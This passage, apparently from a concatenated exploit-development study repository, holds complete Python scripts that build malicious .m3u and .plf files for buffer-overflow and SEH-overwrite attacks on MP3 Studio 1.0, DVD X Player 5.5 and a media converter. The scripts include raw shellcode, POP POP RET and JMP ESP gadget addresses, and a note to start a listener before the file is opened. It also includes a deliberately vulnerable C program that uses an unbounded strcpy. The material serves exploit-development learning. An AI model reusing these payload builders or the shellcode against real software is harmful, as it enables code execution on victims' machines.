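# imm8 add is 3 bytes and the window after ESP is assumed to be tiny.
STACK_ADJUST = b"\x83\xc4\x60" * 3 + b"\xff\xe4"

# Imagine buffer space is only 54 bytes; the rest of that window is "X".
AVAILABLE_BUFFER = 54

# Trailing filler (0xaa) that makes the file long enough for the second
# copy of the buffer to sit where the stub expects it.  Value from the original.
RANDOM_OFFSET = 230

OUTPUT = "mal.m3u"


def build_custom_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Return the .m3u contents.

    Layout (file offsets, for the 351-byte default shellcode)::

        0      "A" * 261                      HEAD_FILLER
        261    NOP sled (16)
        277    shellcode (351)
        628    "A" * (26070 - 628)            filler up to the return address
        26070  JMP_ESP
        26074  "CCCC"                         PAD
        26078  STACK_ADJUST (11 bytes)
        26089  "X" * 43                       rest of the 54-byte window
        26132  0xaa * 230                     RANDOM_OFFSET trailer

    The filler between the shellcode and the return address is computed from
    the real shellcode length, so the return address stays at OFFSET_XPSP3
    for any shellcode that fits in front of it.

    Raises:
        ValueError: if the shellcode is too long to fit before OFFSET_XPSP3.
    """
    head = b"A" * HEAD_FILLER + NOP_SLED + shellcode
    if len(head) > OFFSET_XPSP3:
        raise ValueError("shellcode does not fit before the return address")
    window = STACK_ADJUST + b"X" * (AVAILABLE_BUFFER - len(STACK_ADJUST))
    return (
        head
        + b"A" * (OFFSET_XPSP3 - len(head))
        + JMP_ESP
        + PAD
        + window
        + b"\xaa" * RANDOM_OFFSET
    )


def main() -> None:
    """Write the payload to OUTPUT in binary mode."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_custom_payload())


if __name__ == "__main__":
    # Start a listener on 127.0.0.1:443 first, then load mal.m3u in the converter.
    main()


# ---- /Corelan/3. SEH Based Exploits/MP3 Studio 1.0 .m3u SEH exploit.py ----
"""MP3 Studio 1.0 -- .m3u SEH overwrite that pops calc.exe.

Product name: MP3 Studio 1.0
Exploit type: SEH based exploit
Author: Abatchy

A long URL entry overwrites an SEH record: the next-SEH pointer is replaced
by a short jump and the handler pointer by a POP POP RET gadget in
xaudio.dll.  When the handler is invoked it returns into the nSEH bytes, the
jump skips over the handler address into the NOP sled, and the sled runs into
the shellcode.  The gadget address is fixed, so this needs a non-ASLR module.
"""

# Spawn calc.exe (encoded payload, kept verbatim; held as bytes so Python 3
# writes it unchanged -- see the 06CUSTOM.py note).
SHELLCODE = (
    b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    b"\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"
    b"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"
    b"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
    b"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
    b"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
    b"\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"
    b"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"
    b"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"
    b"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"
    b"\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"
    b"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"
    b"\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"
    b"\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"
    b"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
    b"\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"
    b"\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"
    b"\x4e\x36\x43\x46\x42\x50\x5a"
)

# nSEH: INT3, JMP SHORT +0x1e, NOP ("JMP $+30" in the original).  The jump
# is taken relative to the byte after ``eb 1e`` (nSEH+3), so it lands at
# nSEH+33: past the 4-byte handler address and 25 bytes into the 46-byte sled.
# NOTE(review): the leading 0xcc is an INT3 left in from debugging.  Under a
# debugger it is a convenient stop; on a live target it raises a fresh
# exception before the jump runs.  Swap it for 0x90 once the landing is
# confirmed.  Kept as in the original so the generated file is unchanged.
JMP_CODE = b"\xcc\xeb\x1e\x90"

# POP POP RET in xaudio.dll (0x1001aeef, little-endian).
POP_POP_RET = b"\xef\xae\x01\x10"

# Output path from the original (the author's XP desktop).  Written as a raw
# string: the original's '\D' only survived because '\D' is not a valid
# escape, which is a SyntaxWarning on current Python.
OUTPUT = r"C:\Documents and Settings\abatchy\Desktop\b.m3u"


def build_mp3studio_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Return the .m3u contents.

    Layout: ``http://`` | "A" * 4103 | JMP_CODE (nSEH) | POP_POP_RET (SEH)
    | NOP * 46 | shellcode | NOP * 500.
    """
    return (
        b"http://"
        + b"A" * 4103
        + JMP_CODE
        + POP_POP_RET
        + b"\x90" * 46
        + shellcode
        + b"\x90" * 500
    )


def main() -> None:
    """Write the payload to OUTPUT in binary mode."""
    with open(OUTPUT, "wb") as fh:
        fh.write(build_mp3studio_payload())


if __name__ == "__main__":
    main()


// ---- /Corelan/3. SEH Based Exploits/SEH.cpp ----
// Deliberately vulnerable test program for studying SEH overwrites (the
// SEH.exe next to it is presumably built from this).  Not for real use.
#define _CRT_SECURE_NO_WARNINGS   // silence MSVC's strcpy warning; the unsafe call is the point

#include <stdio.h>    // printf
#include <string.h>   // strcpy
// The original had a third #include whose name was lost in page extraction.

int ExceptionHandler(void);

// Copies argv[1] into a 512-byte stack buffer with no length check, so a
// longer argument overflows temp and can reach the SEH record registered by
// the __try block -- which is what the SEH exercises are built around.
// argc is not checked: running with no argument dereferences argv[1] == NULL.
int main(int argc, char *argv[]) {

	char temp[512];

	printf("Application launched");

	__try {

		strcpy(temp, argv[1]);   // unbounded copy: the vulnerability

	}
	__except (ExceptionHandler()) {
	}
	return 0;
}

// Filter expression for the __except above.  It prints and returns 0, which
// is EXCEPTION_CONTINUE_SEARCH, so the __except body never runs and the
// exception is passed on to the next handler in the chain.
int ExceptionHandler(void) {
	printf("Exception");
	return 0;
}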
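# ---- /Corelan/3. SEH Based Exploits/SEH.exe ----
# Binary, not reproduced here.  Raw file in the repository:
# https://raw.githubusercontent.com/abatchy17/ExploitDevSnippets/9c60e804245cf36ceae9f5c167cab4935093b5d7/Corelan/3. SEH Based Exploits/SEH.exe
# NOTE(review): a committed .exe is an unverifiable binary; build it yourself
# from SEH.cpp rather than running the checked-in one.

# ---- /FuzzySecurity/dvdxplayer_SEH_basedexploit.py ----
#!/usr/bin/env python3
# (The shebang must be line 1 of the real file.  The original had
#  "#!/usr/bin/python -w" on line 5, where it is just a comment, and
#  "-w" is not a python option anyway.)
"""DVD X Player 5.5 Professional -- .plf SEH overwrite.

Product name: DVD X Player 5.5 Professional
Exploit type: SEH based exploit
Author: Abatchy

Writes ``evil.plf``.  608 bytes of filler reach the SEH record; the next-SEH
field gets ``nop, nop, jmp short +6`` and the handler field a POP POP RET in
EPG.dll.  When the handler fires it returns into nSEH, the short jump (taken
from the byte after ``eb 06``, i.e. nSEH+4) lands at nSEH+10, 2 bytes into
the 16-byte NOP sled that follows the handler address, and the sled runs into
the shellcode.  The fixed gadget address needs a non-ASLR module.
"""

# Shellcode taken verbatim from the original (generator options not recorded).
# Held as bytes so Python 3 writes the high bytes unchanged; the original's
# str + text-mode open only produced this byte sequence on Python 2.
SHELLCODE = (
    b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
    b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
    b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
    b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
    b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
    b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
    b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
    b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
    b"\x7f\xe8\x7b\xca"
)

# nSEH: nop, nop, jmp short +6.
NSEH = b"\x90\x90\xeb\x06"

# POP POP RET found in EPG.dll (0x61602adb, little-endian).
POP_POP_RET = b"\xdb\x2a\x60\x61"

# Filler bytes before the SEH record.
SEH_OFFSET = 608

# Total file size; the trailing NOPs are sized to hit this exactly
# (608 + 4 + 4 + 16 + 144 + 1224 = 2000, as in the original arithmetic).
TOTAL_LEN = 2000

FILENAME = "evil.plf"


def build_dvdx_seh_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Return the .plf contents: filler | NSEH | POP_POP_RET | NOP*16 | shellcode | NOP trailer.

    The trailer is computed from the real prefix length so the file is always
    TOTAL_LEN bytes, instead of hard-coding the shellcode size.

    Raises:
        ValueError: if the prefix already exceeds TOTAL_LEN.
    """
    prefix = b"A" * SEH_OFFSET + NSEH + POP_POP_RET + b"\x90" * 16 + shellcode
    if len(prefix) > TOTAL_LEN:
        raise ValueError("payload exceeds TOTAL_LEN")
    return prefix + b"\x90" * (TOTAL_LEN - len(prefix))


def main() -> None:
    """Write the payload to FILENAME in binary mode."""
    with open(FILENAME, "wb") as fh:
        fh.write(build_dvdx_seh_payload())


if __name__ == "__main__":
    main()


# ---- /FuzzySecurity/dvdxplayer_stackbasedexploit.py ----
#!/usr/bin/env python3
# (Shebang must be line 1 of the real file; see note in the SEH variant.)
"""DVD X Player 5.5 Professional -- .plf saved-return-address overwrite.

Product name: DVD X Player 5.5 Professional
Exploit type: Stack based overflow exploit
Author: Abatchy

Writes ``evil.plf``.  260 bytes of filler reach the saved return address,
which is replaced with a JMP ESP in EPG.dll; the bytes after it are 16 "C"
(``inc ebx``), four INT3s, a 16-byte NOP sled and the shellcode.

NOTE(review): the four 0xcc bytes are INT3 breakpoints left in from
debugging.  Outside a debugger they raise a breakpoint exception and the
process dies before the sled is reached; replace them with 0x90 once the
landing is confirmed.  Kept as in the original so the file is unchanged.

Fix vs. the original: its trailer arithmetic (2000-260-4-16-4-144) left out
the 16-byte sled, so the file came out 2016 bytes instead of the intended
2000.  The trailer is now sized from the real prefix length.
"""

# Shellcode taken verbatim from the original (generator options not recorded).
SHELLCODE = (
    b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
    b"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
    b"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
    b"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
    b"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
    b"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
    b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
    b"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
    b"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
    b"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
    b"\x7f\xe8\x7b\xca"
)

# JMP ESP found in EPG.dll (0x616525cb, little-endian).
JMP_ESP = b"\xcb\x25\x65\x61"

# Filler bytes before the saved return address.
RET_OFFSET = 260

# Debug breakpoints kept from the original -- see the review note above.
INT3_MARKER = b"\xcc" * 4

# Intended total file size.
TOTAL_LEN = 2000

FILENAME = "evil.plf"


def build_dvdx_stack_payload(shellcode: bytes = SHELLCODE) -> bytes:
    """Return: filler | JMP_ESP | "C"*16 | INT3_MARKER | NOP*16 | shellcode | NOP trailer.

    Raises:
        ValueError: if the prefix already exceeds TOTAL_LEN.
    """
    prefix = (
        b"A" * RET_OFFSET
        + JMP_ESP
        + b"C" * 16
        + INT3_MARKER
        + b"\x90" * 16
        + shellcode
    )
    if len(prefix) > TOTAL_LEN:
        raise ValueError("payload exceeds TOTAL_LEN")
    return prefix + b"\x90" * (TOTAL_LEN - len(prefix))


def main() -> None:
    """Write the payload to FILENAME in binary mode."""
    with open(FILENAME, "wb") as fh:
        fh.write(build_dvdx_stack_payload())


if __name__ == "__main__":
    main()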